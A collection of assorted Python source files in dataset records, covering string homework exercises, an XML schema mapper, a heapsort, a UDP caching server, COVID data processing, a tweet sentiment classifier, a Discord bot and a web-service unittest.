replace(s, old, new)\n#\ndef replace(s, old, new):\n old_len = len(old)\n index = s.find(old)\n head = s[:index]\n tail = s[index+old_len:]\n # print(head)\n # print(tail)\n return head + new + tail\n\nprint(replace('hello, world!', 'world', 'gua'))\n\n# 例子\n# print(replace('hello, world!', 'world', 'gua'))\n# # 'hello, gua!'\n# 提示: 查找切片 2 次\n#\n#\n# 8,\n# 实现一个函数, 接受两个参数 s1 s2 都是字符串\n# 返回一个数字, 这个数字是 s2 在 s1 中出现的下标\n# 如果不存在则返回 -1\n# def index(s1, s2)\ndef index(s1, s2):\n i = -1\n start = 0\n while len(s1) >= len(s2):\n if starts_with(s1, s2):\n i = start\n break\n else:\n s1 = s1[1:]\n start += 1\n return i\nprint(index('hello', 'll'))\nprint(index('hello, world!', 'ld!'))\n#\n# 提示\n# 循环切片加 starts_with\n#\n#\n# 9,\n# 实现一个函数, 接受 2 个参数 s1 s2 都是字符串\n# 返回一个列表,列表中保存了所有 s2 出现在 s1 中的下标\n# def indices(s1, s2)\n#\ndef indices(s1, s2):\n index_list = []\n start = 0\n while len(s1) >= len(s2):\n if starts_with(s1, s2):\n index_list.append(start)\n s1 = s1[1:]\n start += 1\n return index_list\nprint('index list', indices('12211341', '1'))\n\n# 例子\n# # 01234567\n# print(indices('12211341', '1'))\n# # [0, 3, 4, 7]\n#\n# 提示: 使用 index 函数加循环\n","sub_path":"base/class11/class10_hw_ans.py","file_name":"class10_hw_ans.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"225142593","text":"import operator\nimport lxml\nimport lxml.etree as etree\n\n\ndef tagname(ns_name, nsmap):\n ns, name = ns_name.split(':')\n return '{' + nsmap[ns] + '}' + name;\n\n\nclass XmlDOMInfo(object):\n def writetoxsd(self, root, parent_el):\n raise NotImplementedError\n \n def toxml(self, xsd, root, *args):\n raise NotImplementedError\n \n def fromxml(self, xsd, root, *args):\n raise NotImplementedError\n\n\nclass XsdDocumentInfo(object):\n default_xsd_nsmap = {\n None: 'http://www.w3.org/2001/XMLSchema',\n 'xs': 'http://www.w3.org/2001/XMLSchema',\n 'xsi': 'http://www.w3.org/2001/XMLSchema-instance',\n 'xse': 'http://www.codesynthesis.com/xmlns/xml-schema-extension'\n }\n \n default_xml_nsmap = {\n 'xs': 'http://www.w3.org/2001/XMLSchema',\n 'xsi': 'http://www.w3.org/2001/XMLSchema-instance',\n 'xse': 'http://www.codesynthesis.com/xmlns/xml-schema-extension'\n }\n \n def __init__(self, nsprefix, ns):\n self.xsd_nsmap = dict(XsdDocumentInfo.default_xsd_nsmap)\n self.xsd_nsmap[nsprefix] = ns\n self.xml_nsmap = dict(XsdDocumentInfo.default_xml_nsmap)\n self.xml_nsmap[nsprefix] = ns\n self.xml_nsmap[None] = ns\n self.targetns = ns\n self.types = list()\n \n def addtype(self, tp):\n self.types.append(tp.complex_type)\n \n def obj_to_element(self, root, el, obj):\n if hasattr(type(obj), 'complex_type'):\n type(obj).complex_type.toxml(self, root, el, obj)\n el.set('{' + self.xml_nsmap['xsi'] + '}type', type(obj).complex_type.full_typename)\n else:\n el.text = str(obj)\n \n def writexsdto(self, fobj):\n xsd = etree.Element('schema', nsmap=self.xsd_nsmap)\n xsd.set('targetNamespace', self.targetns)\n for ct in self.types:\n ct.writetoxsd(xsd, xsd)\n fobj.write(etree.tostring(xsd, pretty_print=True))\n \n def writetoxml(self, roottag, obj, fobj):\n xml = etree.Element('{' + self.targetns + '}' + roottag, nsmap=self.xml_nsmap)\n self.obj_to_element(xml, xml, obj)\n fobj.write(etree.tostring(xml, pretty_print=True))\n\n\nclass XmlElementInfo(XmlDOMInfo):\n def __init__(self, name, typename, is_optional=False, is_singular=True):\n self.name = name\n self.typename = typename\n self.is_optional = is_optional\n self.is_singular = is_singular\n XmlDOMInfo.__init__(self)\n \n def writetoxsd(self, root, parent_el):\n el = etree.SubElement(parent_el, 'element')\n el.set('name', self.name)\n el.set('type', self.typename)\n if self.is_optional:\n el.set('minOccurs', '0')\n if self.is_singular:\n el.set('maxOccurs', '1')\n else:\n el.set('minOccurs', '1')\n if self.is_singular:\n el.set('maxOccurs', '1')\n self.writetoxsd_ext(el)\n \n def writetoxsd_ext(self, el):\n pass\n \n def toxml(self, xsd, root, parent_el, value):\n if value is None:\n return\n if not self.is_singular:\n for subvalue in value:\n el = etree.SubElement(parent_el, self.name)\n xsd.obj_to_element(root, el, subvalue)\n else:\n el = etree.SubElement(parent_el, self.name)\n xsd.obj_to_element(root, el, value)\n\n\nclass XmlRefElementInfo(XmlElementInfo):\n def __init__(self, name, target_type, *args, **kwargs):\n self.target_type = target_type\n XmlElementInfo.__init__(self, name, 'xs:IDREF', *args, **kwargs)\n \n def writetoxsd_ext(self, el):\n el.set(tagname('xse:refType', el.nsmap), self.target_type)\n\nclass XmlAttributeInfo(XmlDOMInfo):\n def __init__(self, name, typename, is_optional=False):\n self.name = name\n self.typename = typename\n self.is_optional = is_optional\n XmlDOMInfo.__init__(self)\n \n def writetoxsd(self, root, parent_el):\n el = etree.SubElement(parent_el, 'attribute')\n el.set('name', self.name)\n el.set('type', self.typename)\n if self.is_optional:\n el.set('use', 'optional')\n \n def toxml(self, xsd, root, parent_el, value):\n if value is not None:\n parent_el.set(self.name, str(value))\n\n\nclass XmlPythonProperty(object):\n def __init__(self, xmlname, xsdinfo, ctattr):\n self.attrname = '__' + xmlname + '_attr__'\n self.xsdinfo = xsdinfo\n self.ctattr = operator.attrgetter(ctattr)\n \n def __get__(self, instance, clss):\n #assert self.attrname in self.__dict__\n return getattr(instance, self.attrname)\n \n def __set__(self, instance, value):\n setattr(instance, self.attrname, value)\n \n def append_to_complex_type(self, ct):\n self.ctattr(ct).append(self)\n\ndef xml_property_func(clss, ctattr, name):\n def func(xmlname, *args, **kwargs):\n return XmlPythonProperty(xmlname, clss(xmlname, *args, **kwargs), ctattr)\n func.__name__ = name\n return func\n\nxml_attribute = xml_property_func(XmlAttributeInfo, 'attributes', 'xml_attribute')\nxml_element = xml_property_func(XmlElementInfo, 'elements', 'xml_element')\nxml_refelement = xml_property_func(XmlRefElementInfo, 'elements', 'xml_refelement')\n\nclass XmlComplexTypeInfo(XmlDOMInfo):\n def __init__(self, namespace, typename, clss, is_abstract=False, extends=None):\n self.namespace = namespace\n self.typename = typename\n self.is_abstract = is_abstract\n self.attributes = list()\n self.elements = list()\n self.extends = extends\n self.pyclss = clss\n XmlDOMInfo.__init__(self)\n \n def writetoxsd(self, root, parent_el):\n complexType_el = etree.SubElement(parent_el, 'complexType')\n complexType_el.set('name', self.typename)\n if self.is_abstract:\n complexType_el.set('abstract', 'true')\n if self.extends is not None:\n complexContent_el = etree.SubElement(complexType_el, 'complexContent')\n extension_el = etree.SubElement(complexContent_el, 'extension')\n extension_el.set('base', self.extends.namespace + ':' + self.extends.typename)\n content_el = extension_el\n else:\n content_el = complexType_el\n sequence_el = etree.SubElement(content_el, 'sequence')\n \n # Add Elements\n for element in self.elements:\n element.xsdinfo.writetoxsd(root, sequence_el)\n \n # Add Attributes\n for attribute in self.attributes:\n attribute.xsdinfo.writetoxsd(root, content_el)\n \n def fromxml(self, root, el, obj=None):\n if obj is None:\n obj = self.pyclss.__new__(self.pyclss)\n if self.extends is not None:\n self.extends.fromxml(root, el, obj)\n for attribute in self.attributes:\n attribute.__set__(obj, attribute.xsdinfo.fromxml(root, el))\n for element in self.elements:\n element.__set__(obj, element.xsdinfo.fromxml(root, el))\n \n def toxml(self, xsd, root, el, obj):\n if self.extends is not None:\n self.extends.toxml(xsd, root, el, obj)\n for attribute in self.attributes:\n attribute.xsdinfo.toxml(xsd, root, el, attribute.__get__(obj, type(obj)))\n for element in self.elements:\n element.xsdinfo.toxml(xsd, root, el, element.__get__(obj, type(obj)))\n \n @property\n def full_typename(self):\n return self.namespace + ':' + self.typename\n\n\ndef xml_complex_type(ns_name, is_abstract=False):\n if ':' in ns_name:\n ns, ctname = ns_name.split(':')\n else:\n raise NotImplementedError\n def xml_complex_type_dec(clss):\n if hasattr(clss, 'complex_type'):\n clss.complex_type = XmlComplexTypeInfo(ns, ctname, clss, is_abstract, clss.complex_type)\n else:\n clss.complex_type = XmlComplexTypeInfo(ns, ctname, clss, is_abstract, None)\n for name, attr in clss.__dict__.items():\n if isinstance(attr, XmlPythonProperty):\n attr.append_to_complex_type(clss.complex_type)\n return clss\n return xml_complex_type_dec\n\n\n","sub_path":"py/chill/ast/_xml.py","file_name":"_xml.py","file_ext":"py","file_size_in_byte":8398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"555149453","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 17 18:04:33 2019\n\n@author: mrodgers\n\"\"\"\n\nimport numpy as np\nimport matplotlib as mpl\n\nx = np.random.normal(0, 10, 100)\n\nmpl.pyplot.hist(x, bins=25, density=True)\nmpl.pyplot.title(\"Michael\")\nmpl.pyplot.xlabel(\"Random {}\".format(\"X\"))\nmpl.pyplot.ylabel(\"Probability\")\nmpl.pyplot.savefig(\"/Users/DirtyMike/Documents/other/languages/python/anaconda/packages/matplotlib/graphs/hist.pdf\",\n orientation='landscape')","sub_path":"python/anaconda/spyder/packages/matplotlib/histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"601637432","text":"\"\"\"\n Written by lomizandtyd.\n Heap Sort\n - 0.1 version\n\"\"\"\n\ndef heapify(dList, root, boundary):\n child = root * 2 + 1\n large = root\n if child <= boundary and dList[large] <= dList[child]:\n large = child\n if child+1 <= boundary and dList[large] <= dList[child+1]:\n large = child + 1\n if large != root:\n dList[root], dList[large] = dList[large], dList[root]\n heapify(dList, large, boundary)\n return dList\n \ndef heapifyNOR(dList, root, boundary):\n child = root * 2 + 1\n large = root\n while child <= boundary:\n if dList[large] <= dList[child]:\n large = child\n if child+1 <= boundary and dList[large] <= dList[child+1]:\n large = child + 1\n if large == root:\n break\n dList[root], dList[large] = dList[large], dList[root]\n root = large\n child = root * 2 + 1\n return dList\n\ndef heapsort(dList):\n heapify = heapifyNOR\n length = len(dList) -1\n for root in range((length -1)/2, -1, -1):\n heapify(dList, root, length)\n \n for end in range(length, 0, -1):\n heapify(dList, 0, end)\n dList[end], dList[0] = dList[0], dList[end]\n return dList\n","sub_path":"other/python/heapsort.py","file_name":"heapsort.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"505172045","text":"import socket\r\nimport sys\r\nimport time\r\n\r\n# get a file and returns 2D list\r\ndef creatListFromFile(fileName):\r\n\tfile1 = open(fileName, 'r')\r\n\tLines = file1.readlines()\r\n\tlistFile = []\r\n\ti = 0\r\n\tfor line in Lines:\r\n\t\tlistFile.append(line.split(\",\"))\r\n\t\t# enter time stamp to when the server learned the info\r\n\t\tif (len(listFile[i]) == 3):\r\n\t\t\tlistFile[i].append(int(time.time()))\r\n\t\telse:\r\n\t\t\tthisTime = int(time.time())\r\n\t\t\tpassTime = thisTime - int(listFile[i][3])\r\n\t\t\tif int(listFile[i][2]) <= passTime:\r\n\t\t\t\tlistFile.pop(i)\r\n\t\t\t\ti = i - 1\r\n\t\ti = i + 1\r\n\tupdateFile(fileName, listFile)\r\n\treturn listFile\r\n\r\n# getting 2D list and look for the domain\r\n# if found return the inside list\r\n# else returning empty ([]) list\r\ndef searchDomainInList (listIPs, domain):\r\n\ti = 0\r\n\tfor oneList in listIPs:\r\n\t\ttry:\r\n\t\t\tdomainInList = listIPs[i][0]\r\n\t\t\tif domainInList == str(domain):\r\n\t\t\t\treturn listIPs[i]\r\n\t\texcept:\r\n\t\t\tpass\r\n\t\ti = i+1\r\n\treturn []\r\n# function take an array and convert to string\r\ndef makeFromArrayToString(arr):\r\n\tret = \"\"\r\n\tfor w in arr:\r\n\t\tret = ret + str(w) + \",\"\r\n\tret = ret[:-1]\r\n\treturn ret\r\n\r\ndef updateFile(fileName, arrayList):\r\n\tarrStr = []\r\n\tfor line in arrayList:\r\n\t\tarrStr.append(makeFromArrayToString(line).replace(\"\\n\",\"\"))\r\n\twith open(fileName, 'w') as f:\r\n\t\tfor line in arrStr:\r\n\t\t\tf.write(\"%s\\n\" % line)\r\n\r\n\r\n# argumnets from command line\r\nmyPort = sys.argv[1]\r\nparentIP = sys.argv[2]\r\nparentPort = sys.argv[3]\r\nipsFileName = sys.argv[4]\r\n# initalize a socket\r\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\ns.bind(('', int(myPort)))\r\n\r\n\r\nwhile True:\r\n\tclientDomain, clientAddress = s.recvfrom(1024)\r\n\tclientDomain = clientDomain.decode('utf-8')\r\n\tlistIps = creatListFromFile(ipsFileName)\r\n\tspecificLine = searchDomainInList(listIps, clientDomain)\r\n\t# is server find the domain in the file\r\n\tif specificLine != []:\r\n\t\tsiteInfo = makeFromArrayToString(specificLine)\r\n\t\tsiteInfo = bytes(siteInfo, 'utf-8')\r\n\t\ts.sendto(siteInfo, clientAddress)\r\n\t# else, send to parent server\r\n\telse:\r\n\t\tclientDomain = bytes(clientDomain, 'utf-8')\r\n\t\ts.sendto(clientDomain, (parentIP, int(parentPort)))\r\n\t\tdata, parentAddress = s.recvfrom(1024)\r\n\t\tarrayToAdd = data.decode('utf-8')\r\n\t\tarrayToAdd = arrayToAdd.split(\",\")\r\n\t\tlistIps.append(arrayToAdd)\r\n\t\tupdateFile(ipsFileName, listIps)\r\n\t\ts.sendto(data, clientAddress)","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"201553823","text":"class Query:\n\n @classmethod\n def find_by_name(cls, otherClass, name):\n for object in otherClass.all():\n if object.name == name:\n return object\n else:\n return 'there is no one named {}' .format(name)\n\n @classmethod\n def count (cls, otherClass):\n totalcount= len(otherClass.all())\n return totalcount\n\n @classmethod\n def name_starts_with (cls, otherClass, initial):\n return [object for object in otherClass.all() if object.name.startswith(initial)]\n\n @classmethod\n def is_older_than(cls, otherClass, age):\n return [object for object in otherClass.all() if object.age > age]\n\n @classmethod\n def mean_age(cls, otherClass):\n totalcount= len(otherClass.all())\n list_of_ages=[object.age for object in otherClass.all()]\n combined_ages=sum(list_of_ages)\n meanage = combined_ages / totalcount\n return meanage\n","sub_path":"query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"480369228","text":"import pandas as pd\nimport numpy as np\nimport requests\nimport datetime\nimport os.path\nimport pprint\nimport shapefile\nimport simplejson\nimport statistics\nimport logging\nimport math, sys\n\nfrom urllib.parse import urlparse\nfrom collections import defaultdict\n\nfrom libs.CovidDatasets import get_public_data_base_url\nfrom libs.us_state_abbrev import US_STATE_ABBREV, us_fips\nfrom libs.datasets import FIPSPopulation\nfrom libs.datasets import JHUDataset\nfrom libs.enums import Intervention\nfrom libs.functions.calculate_projections import (\n get_state_projections_df,\n get_county_projections_df,\n)\nfrom libs.datasets.projections_schema import OUTPUT_COLUMN_REMAP_TO_RESULT_DATA\nfrom libs.datasets.results_schema import (\n RESULT_DATA_COLUMNS_STATES,\n RESULT_DATA_COLUMNS_COUNTIES,\n)\nfrom libs.constants import NULL_VALUE\n\n_logger = logging.getLogger(__name__)\n\n\ndef _get_interventions_df():\n # TODO: read this from a dataset class\n interventions_url = \"https://raw.githubusercontent.com/covid-projections/covid-projections/master/src/assets/data/interventions.json\"\n interventions = requests.get(interventions_url).json()\n return pd.DataFrame(list(interventions.items()), columns=[\"state\", \"intervention\"])\n\n\ndef _get_abbrev_df():\n # TODO: read this from a dataset class\n return pd.DataFrame(\n list(US_STATE_ABBREV.items()), columns=[\"state\", \"abbreviation\"]\n )\n\n\ncounty_replace_with_null = {\"Unassigned\": NULL_VALUE}\n\n\ndef _get_usa_by_county_df():\n # TODO: read this from a dataset class\n latest_path = JHUDataset.latest_path()\n _logger.info(f\"Loading latest JHU data from {latest_path}\")\n raw_df = pd.read_csv(latest_path, dtype={\"FIPS\": str})\n raw_df[\"FIPS\"] = raw_df[\"FIPS\"].astype(str).str.zfill(5)\n\n column_mapping = {\n \"Province_State\": \"Province/State\",\n \"Country_Region\": \"Country/Region\",\n \"Last_Update\": \"Last Update\",\n \"Lat\": \"Latitude\",\n \"Long_\": \"Longitude\",\n \"Combined_Key\": \"Combined Key\",\n \"Admin2\": \"County\",\n \"FIPS\": \"State/County FIPS Code\",\n }\n remapped_df = raw_df.rename(columns=column_mapping)\n\n # USA only\n us_df = remapped_df[(remapped_df[\"Country/Region\"] == \"US\")]\n jhu_column_names = [\n \"Province/State\",\n \"Country/Region\",\n \"Last Update\",\n \"Latitude\",\n \"Longitude\",\n \"Confirmed\",\n \"Recovered\",\n \"Deaths\",\n \"Active\",\n \"County\",\n \"State/County FIPS Code\",\n \"Combined Key\",\n # Incident rate and people tested do not seem to be available yet\n # \"Incident Rate\",\n # \"People Tested\",\n ]\n final_df = pd.DataFrame(us_df, columns=jhu_column_names)\n final_df[\"Last Update\"] = pd.to_datetime(final_df[\"Last Update\"])\n final_df[\"Last Update\"] = final_df[\"Last Update\"].dt.strftime(\"%-m/%-d/%Y %H:%M\")\n\n final_df[\"County\"] = final_df[\"County\"].replace(county_replace_with_null)\n final_df[\"Combined Key\"] = final_df[\"Combined Key\"].str.replace(\"Unassigned, \", \"\")\n final_df = final_df.fillna(NULL_VALUE)\n final_df = final_df.drop_duplicates(\n \"State/County FIPS Code\"\n ) # note this is a hack, 49053 is dupped in JHU data :(\n final_df.index.name = \"OBJECTID\"\n # assert unique key test\n assert final_df[\"Combined Key\"].value_counts().max() == 1\n assert final_df[\"State/County FIPS Code\"].value_counts().max() == 1\n\n return final_df\n\n\ndef get_usa_by_county_with_projection_df(input_dir, intervention_type):\n us_only = _get_usa_by_county_df()\n fips_df = FIPSPopulation.local().data # used to get interventions\n interventions_df = _get_interventions_df()\n projections_df = get_county_projections_df(\n input_dir, intervention_type, interventions_df\n )\n\n counties_decorated = (\n us_only.merge(\n projections_df,\n left_on=\"State/County FIPS Code\",\n right_on=\"FIPS\",\n how=\"inner\",\n )\n .merge(fips_df[[\"state\", \"fips\"]], left_on=\"FIPS\", right_on=\"fips\", how=\"inner\")\n .merge(interventions_df, left_on=\"state\", right_on=\"state\", how=\"inner\")\n )\n\n counties_remapped = counties_decorated.rename(\n columns=OUTPUT_COLUMN_REMAP_TO_RESULT_DATA\n )\n counties = pd.DataFrame(counties_remapped, columns=RESULT_DATA_COLUMNS_COUNTIES)\n counties = counties.fillna(NULL_VALUE)\n counties.index.name = \"OBJECTID\"\n # assert unique key test\n\n if counties[\"Combined Key\"].value_counts().max() != 1:\n raise Exception(f\"counties['Combined Key'].value_counts().max() = {counties['Combined Key'].value_counts().max()}, at input_dir {input_dir}.\")\n return counties\n\n\ndef get_usa_by_states_df(input_dir, intervention_type):\n\n us_only = _get_usa_by_county_df()\n abbrev_df = _get_abbrev_df()\n interventions_df = _get_interventions_df()\n projections_df = get_state_projections_df(\n input_dir, intervention_type, interventions_df\n )\n\n states_group = us_only.groupby([\"Province/State\"])\n states_agg = states_group.aggregate(\n {\n \"Last Update\": \"max\",\n \"Confirmed\": \"sum\",\n \"Recovered\": \"sum\",\n \"Deaths\": \"sum\",\n \"Active\": \"sum\",\n \"Country/Region\": \"first\",\n \"Latitude\": \"first\",\n \"Longitude\": \"first\"\n # People tested is currently null\n #'People Tested': 'sum'\n }\n )\n\n # basically the states_agg has full state names, the interventions have abbreviation so we need these to be merged\n states_abbrev = (\n states_agg.merge(abbrev_df, left_index=True, right_on=\"state\", how=\"left\")\n .merge(\n # inner merge to filter to only the 50 states\n interventions_df,\n left_on=\"abbreviation\",\n right_on=\"state\",\n how=\"inner\",\n )\n .merge(projections_df, left_on=\"state_y\", right_on=\"State\", how=\"left\")\n .drop([\"abbreviation\", \"state_y\", \"State\"], axis=1)\n )\n\n states_remapped = states_abbrev.rename(columns=OUTPUT_COLUMN_REMAP_TO_RESULT_DATA)\n\n states_final = pd.DataFrame(states_remapped, columns=RESULT_DATA_COLUMNS_STATES)\n states_final = states_final.fillna(NULL_VALUE)\n states_final[\"Combined Key\"] = states_final[\"Province/State\"]\n states_final[\"State/County FIPS Code\"] = states_final[\"Province/State\"].map(us_fips)\n\n states_final.index.name = \"OBJECTID\"\n # assert unique key test\n assert states_final[\"Combined Key\"].value_counts().max() == 1\n\n return states_final\n\n\n# us_only = _get_usa_by_county_df()\n# us_only.to_csv(\"results/counties.csv\")\n\n# states_final = get_usa_by_states_df()\n# states_final.to_csv('results/states.csv')\n","sub_path":"libs/build_processed_dataset.py","file_name":"build_processed_dataset.py","file_ext":"py","file_size_in_byte":6697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"107757901","text":"import os\nimport time\nfrom string import punctuation\n\nimport nltk\nimport pandas as pd\n# from gensim.models import Word2Vec\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\n\nnltk.download('stopwords')\nnltk.download('punkt')\nos.listdir(\".\")\n\nstop_words = set(stopwords.words('english'))\ntable = str.maketrans('', '', punctuation)\n\n\n# print(stop_words)\n# print(punctuation)\n# print(table)\n\n\ndef textclean(text):\n tokens = word_tokenize(text)\n # print(tokens)\n tokens = [word for word in tokens if word.isalpha()]\n # print(tokens)\n tokens = [w.translate(table) for w in tokens]\n # print(tokens)\n tokens = [word for word in tokens if word not in stop_words]\n # print(tokens)\n tokens = [word for word in tokens if len(word) > 1]\n return tokens\n\n\nsentence = \"Line that shows when sentence is converted to list of words. Isn't it cool\"\n# print(textclean(sentence))\n\n\nsentiment_dictionary = {0: 'negative', 2: 'neutral', 4: 'positive'}\n\ndf = pd.read_excel('dataset3.xlsx').reset_index(drop=True).iloc[:1000]\n\ndf = df[[0, 5]]\ndf.columns = ['label', 'tweet']\nprint(df.head())\n\nX_train, X_test, y_train, y_test = train_test_split(df[['tweet']], df[['label']])\n\nprint(X_train.shape)\nprint(y_train.shape)\nprint(X_test.shape)\nprint(y_test.shape)\n\ntweets = []\nfor i in range(len(X_train)):\n words = X_train.iloc[i]['tweet']\n sentiment = y_train.iloc[i]['label']\n words_filtered = [e.lower() for e in words.split() if len(e) >= 3]\n tweets.append((words_filtered, sentiment_dictionary[sentiment]))\n\nfor current_tweet, sentiment in tweets[:5]:\n print(current_tweet, sentiment)\n\n\ndef get_words_in_tweets(tweets):\n all_words = []\n for (words, sentiment) in tweets:\n all_words.extend(words)\n return all_words\n\n\ndef get_word_features(wordlist):\n wordlist = nltk.FreqDist(wordlist)\n word_features = wordlist.keys()\n return word_features\n\n\nword_features = get_word_features(get_words_in_tweets(tweets))\n\n\ndef extract_features(document):\n document_words = set(document)\n features = {}\n for word in word_features:\n features['contains(%s)' % word] = (word in document_words)\n return features\n\n\ntraining_set = nltk.classify.apply_features(extract_features, tweets)\n\na = time.time()\nclassifier = nltk.classify.SklearnClassifier(SVC(kernel='linear'))\nclassifier.train(training_set)\n\nprint(time.time() - a)\n\na = time.time()\npredicted = classifier.classify_many([extract_features(tweet.split()) for tweet in X_test['tweet']])\n\ny_pred = []\nfor fr in predicted:\n if fr == 'negative':\n y_pred.append(0)\n else:\n y_pred.append(4)\n\ny_true = list(y_test.values)\nprint(accuracy_score(y_true, y_pred))\nprint(time.time() - a)\n","sub_path":"final_SVM.py","file_name":"final_SVM.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"306738599","text":"from flask import Flask, url_for\nfrom flask.ext.login import LoginManager\nimport os\n\napp = Flask(__name__, static_folder='static')\napp.config.update(\n\tDEBUG = True,\n\tSQLALCHEMY_DATABASE_URI = 'sqlite:///database.db',\n\tSECRET_KEY = 'something secret'\n)\n\nlogin_manager = LoginManager()\nlogin_manager.session_protection = 'strong'\nlogin_manager.login_view = 'index_view'\nlogin_manager.init_app(app)\n\nfrom app import routes","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"18196800","text":"#!/usr/bin/env python3\nimport sys\nDEBUG = len(sys.argv) > 1\n\nimport random\n# 64 bits of randomness\nCUR = random.randrange(2**(8*64)).to_bytes(64,'little')\n\ndouble_stopper = \"DzvBotMain.pid\"\n\nimport os\ndef chdir():\n d = os.path.split(__file__)[0]\n if d: os.chdir(d)\nchdir()\nprint(\"Current Directory Set To:\",os.getcwd())\nif not os.path.exists(double_stopper): \n with open(double_stopper, \"wb\") as f: f.write(CUR)\n\nimport mmap\nmmapfile = open(double_stopper, \"r+b\")\nMM = mmap.mmap(mmapfile.fileno(), 0)\nMM[:64] = CUR\n# if the MM doesnt equal CUR anymore that means someone else started running\n\ndef checkConstants(cfile=\"constants.py\"):\n if os.path.exists(cfile): return\n print(\"Go to https://discordapp.com/developers/applications/me and get the ClientID and Token\")\n ClientID = input(\"ClientID: \")\n Token = input(\"Token: \")\n with open(cfile,\"w\") as f: f.write(\"ClientID = '%s'\\nToken = '%s'\"%(ClientID,Token))\ncheckConstants()\n\nfrom constants import ClientID,Token\n\nimport discord\nimport asyncio\nimport commands\n\n__doc__ = '''https://discordapp.com/oauth2/authorize?&client_id=%s&scope=bot&permissions=11328'''%ClientID\n\nclient = discord.Client()\n@client.event\nasync def on_message(message):\n if MM[:64] != CUR:\n await client.logout()\n return\n\n if message.author.bot or message.author == client.user: return\n\n if DEBUG:\n global M\n M = message\n\n # If I was mentioned you want me to do something\n if (client.user.mentioned_in(message) and client.user in message.mentions) or message.channel.is_private:\n if DEBUG: print(message.clean_content)\n await commands.command(client,message)\n else: # If not mentioned I might react c;\n await commands.react(client,message)\n sys.stdout.flush()\n\nfrom threading import Thread\n# I dont run it directly cause I don't trust it to die on SIGTERM\nt = Thread(target = lambda: client.run(Token), daemon=True)\nt.start()\nsys.stdout.flush()\nif DEBUG:\n print(__doc__)\n from discord.utils import find # when you have a list of stuff to look through use find to find stuff for you\n RUN = client.loop.create_task # A lot of coroutines cant be run directly. Use this to run them\nelse:\n t.join()\n if MM[:64] == CUR: # if ended of own volition (aka error killed the thread)\n MM[:] = b\"\\x00\"*len(MM[:])\nmmapfile.close()","sub_path":"DzvBotMain.py","file_name":"DzvBotMain.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"438151469","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@version: $\n@author: zhuzhenping\n@contact: zhuzhenping@hikvision.com\n@site: \n@software: PyCharm\n@file name: updateFields.py\n@created time: 2017/3/27 20:01\nDescription:对已有的某条数据进行更改,实现纠正错误的功能\n\"\"\"\n\nimport unittest\nfrom TestCaseWorkspace.common import tools\nimport random\nimport json\nimport time\n\nrequestUrl = tools.getConfYaml(\"url\",\"url_8580\")\n\n\ncss = tools.bcolors\n\ndateELASTIC = {\n \"rowKey\" : \"\",\n}\n\ndateELASTIC_old = {\n \"rowKey\" : \"\",\n}\n\ndateELASTIC_1 = {\n\n}\n\nrequestDateJson ={\n 'ws:updateFields': { # 是否必填\n 'fieldJson' : \"\" # Y\t纠错参数,格式为json\n }\n}\n\n\n#Description:对已有的某条数据进行更改,实现纠正错误的功能\nclass updateFields(unittest.TestCase):\n\n def setUp(self):\n pass\n\n #fieldJson为空时,非法值时\n def test_001(self):\n #{\"rowKey\":\"20150380800101_dc71bdf7cffc4690a328f03faa62220c\",\"brand\":3}\n #requestDateJson[\"ws:updateFields\"][\"fieldJson\"] = (dateELASTIC)\n for requestJson in [\"\",\"[]\",\"{}\",0,\"-1\"]:\n requestDateJson[\"ws:updateFields\"][\"fieldJson\"]=requestJson\n response =tools.requests_xml(requestUrl,requestDateJson)\n resp = tools.getresReturn(response,\"updateFields\")\n resp = json.loads(resp)\n #判断状态查询状态\n self.assertEquals(resp[\"ret\"],\"-1\")\n\n #fieldJson字段仅包含rowKey时\n def test_002(self):\n requestDateJson[\"ws:updateFields\"][\"fieldJson\"]='{\"rowKey\":\"20150380800101_dc71bdf7cffc4690a328f03faa62220c\"}'\n response =tools.requests_xml(requestUrl,requestDateJson)\n resp = tools.getresReturn(response,\"updateFields\")\n resp = json.loads(resp)\n #判断状态查询状态\n self.assertEquals(resp[\"ret\"],\"-1\")\n self.assertEquals(resp[\"msg\"],\"0\")\n\n #fieldJson字段不包含纠错字段(只有纠错字段,或者包含时间戳字段时)\n def test_003(self):\n for requestJson in ['{\"brand\":3}','{\"timestamp_\":\"1475924635925\",}','{\"timestamp_\":\"1475924635925\",\"brand\":3}','{\"timestamp_\":\"1475924635925\",\"brand\":3,\"things\":7}']:\n requestDateJson[\"ws:updateFields\"][\"fieldJson\"]=requestJson\n response =tools.requests_xml(requestUrl,requestDateJson)\n resp = tools.getresReturn(response,\"updateFields\")\n resp = json.loads(resp)\n #判断状态查询状态\n self.assertEquals(resp[\"ret\"],\"-1\")\n self.assertEquals(resp[\"msg\"],\"查询失败\")\n\n\n #@@@失败项原因:纠错功能接口中传入修改的参数值,通过UDE反查发现修改未生效\n 